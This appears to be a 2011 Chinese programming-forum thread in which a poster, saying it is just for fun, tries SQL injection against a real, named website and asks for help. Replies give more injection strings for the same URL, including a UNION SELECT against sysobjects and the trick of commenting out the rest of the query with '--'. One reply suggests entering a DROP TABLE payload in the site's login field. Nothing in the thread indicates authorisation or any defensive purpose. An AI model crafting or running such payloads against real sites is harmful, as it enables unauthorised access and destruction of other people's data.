62,046
社区成员
发帖
与我相关
我的任务
分享这个可以SQL注入网站
我出于好奇试了个网站,没想到真没有屏蔽SQL注入。 我不是恶意破坏,只是玩。但是没有成功
http://www.jzfuwu.net/ADomesticRead.aspx?IDNo=11620' and select name from sysobjects where name>0 and 1= '1
返回的结果跟我想要的不一样。 没有提示哪个表转换INT出错, 希望有人提示下, 在哪拼错了
http://www.jzfuwu.net/ADomesticRead.aspx?IDNo=11620' and 1= '1 但是这么写就对。
http://www.jzfuwu.net/ADomesticRead.aspx?IDNo=11620' and select name from sysobjects where name>0 and 1= '1
返回的结果跟我想要的不一样。 没有提示哪个表转换INT出错, 希望有人提示下, 在哪拼错了
http://www.jzfuwu.net/ADomesticRead.aspx?IDNo=11620' and 1= '1 但是这么写就对。
...全文
请发表友善的回复…
发表回复
第安城 2011-03-31
- 打赏
- 举报
这个我已经可以注入了,就是猜不到表名,
你可以试试在登录的用户名框里输入
123' drop table sysobjects--
中间那个地方的sql是可以执行的
你可以试试在登录的用户名框里输入
123' drop table sysobjects--
中间那个地方的sql是可以执行的
PitTroll 2011-03-05
- 打赏
- 举报
[Quote=引用 6 楼 javaniejian 的回复:]
后面加两 --
把后面的语句注释掉
[/Quote]
也不行的,我昨天试了。
后面加两 --
把后面的语句注释掉
[/Quote]
也不行的,我昨天试了。
PitTroll 2011-03-04
- 打赏
- 举报
[Quote=引用 1 楼 callmesai 的回复:]
他后面有order by
http://www.jzfuwu.net/ADomesticRead.aspx?IDNo=11620' union select 0,1,2,3 from sysobjects where name>0 and '1'= '1'
可以根据这个SQL判断
[/Quote]
也有问题啊。
他后面有order by
http://www.jzfuwu.net/ADomesticRead.aspx?IDNo=11620' union select 0,1,2,3 from sysobjects where name>0 and '1'= '1'
可以根据这个SQL判断
[/Quote]
也有问题啊。
happy664618843 2011-03-04
- 打赏
- 举报
callmesai 2011-03-04
- 打赏
- 举报
他后面有order by
http://www.jzfuwu.net/ADomesticRead.aspx?IDNo=11620' union select 0,1,2,3 from sysobjects where name>0 and '1'= '1'
可以根据这个SQL判断
http://www.jzfuwu.net/ADomesticRead.aspx?IDNo=11620' union select 0,1,2,3 from sysobjects where name>0 and '1'= '1'
可以根据这个SQL判断
写代码写出法拉利 2011-03-04
- 打赏
- 举报
后面加两 --
把后面的语句注释掉
把后面的语句注释掉
